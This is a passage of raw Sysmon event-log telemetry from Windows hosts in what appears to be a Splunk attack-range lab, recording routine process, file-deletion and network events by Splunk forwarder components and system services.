Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285140Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:02.639{C8EA50B7-0E4E-6216-A604-000000003802}4268C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000285139Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:02.466{C8EA50B7-0E4E-6216-A504-000000003802}5948172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285138Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:02.138{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E4E-6216-A504-000000003802}5948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285137Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:02.138{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285136Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:02.138{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285135Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:02.138{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285134Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:02.138{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285133Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:02.138{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0E4E-6216-A504-000000003802}5948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285132Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:02.138{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E4E-6216-A504-000000003802}5948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285131Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:02.138{C8EA50B7-0E4E-6216-A504-000000003802}5948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214290Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:03.951{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3DD3C677A657BDB8EAEDEC740AC545C,SHA256=F0DCE57771FC0216F2C1BBC8EFF0EB93D5BA26FD060DF40B9513FB9EEC3BE29E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285151Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:03.888{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38055CD9B8A69EAAFE7B2C2C04C801D8,SHA256=14577935BA2E5F9875E187C55C3D7FAA2B4A849E8912C3F47F95C043ED0BD924,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285150Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:03.153{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B2484E7A8C8D2ABBC5611A964F4637DE,SHA256=4367321519DECB9A1E6562B713D9A6A931D3AF52AB33014EB19B2B26F71C722A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285149Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:03.153{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D5D9A74843A6F5975F7D44B1480F340,SHA256=D3A73557918C2775592D77699F77D84E63AA38D8FEDC5B3A651CF79F3AC607BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214291Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:04.966{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCD561D57B414DE4FEACD85934C627F4,SHA256=7E719E4F75E29ABDB6ABBBAE1540A56603D8FB1B0F85741DBF02037FA092F92C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285163Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:04.903{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70452712DA455E9257C06A0C4501E1E6,SHA256=2CCDCDBF3D75715FFC6045D02DBC968F229DC6177C971D06DA6187E9F9498FC9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285162Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:03.099{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53231-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000285161Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:03.099{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53231-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000285160Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:04.653{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B2484E7A8C8D2ABBC5611A964F4637DE,SHA256=4367321519DECB9A1E6562B713D9A6A931D3AF52AB33014EB19B2B26F71C722A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285159Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:04.278{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E50-6216-A704-000000003802}5796C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285158Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:04.278{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285157Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:04.278{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285156Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:04.278{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285155Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:04.278{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285154Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:04.278{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-0E50-6216-A704-000000003802}5796C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285153Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:04.278{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E50-6216-A704-000000003802}5796C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285152Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:04.279{C8EA50B7-0E50-6216-A704-000000003802}5796C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285164Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:05.935{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2739C4A08CDDCA908E106EE85A48D2B6,SHA256=161D9379F4D8D61B7FB876AD79DFB23DE14CD0F194B297318395FFBBD5EFD2ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214292Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:05.982{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBE3EEB7F16300CCE15FC093FD188E26,SHA256=54B03758057420F28676464A60A8EACA4B64FF66BE6BC77E46DEA04C0A149F37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285166Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:06.966{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0FA24DE7CD778EC70BE765135592517,SHA256=81646BB0FEFD5AAB1BF79808CBD105A95F29517EA3511393AE8B66BBDCCA9ED5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285165Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:04.630{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53232-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000214294Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:04.515{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51178-false10.0.1.12-8000- 23542300x8000000000000000214293Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:06.998{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA93E4CFF3E2A34C1F55490E23E3F418,SHA256=95F1A131E1BC4A6ABD1A5AC0256FCF812955CAB86938DCCBE90B89A54948F876,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214295Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:07.998{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C31FC9159DC717244B8A05000E065F2F,SHA256=77150E35EF61C821894389834494CE32B481E6B52A398BF1B64CE7162169E33E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285167Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:08.013{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5C834630AD2E7B1F4EACEB9AA7632E1,SHA256=D82C57BF1970A5AD14E32B4F106F927FCC103B91534BB51FF0AAE038782DC06A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214296Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:09.013{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 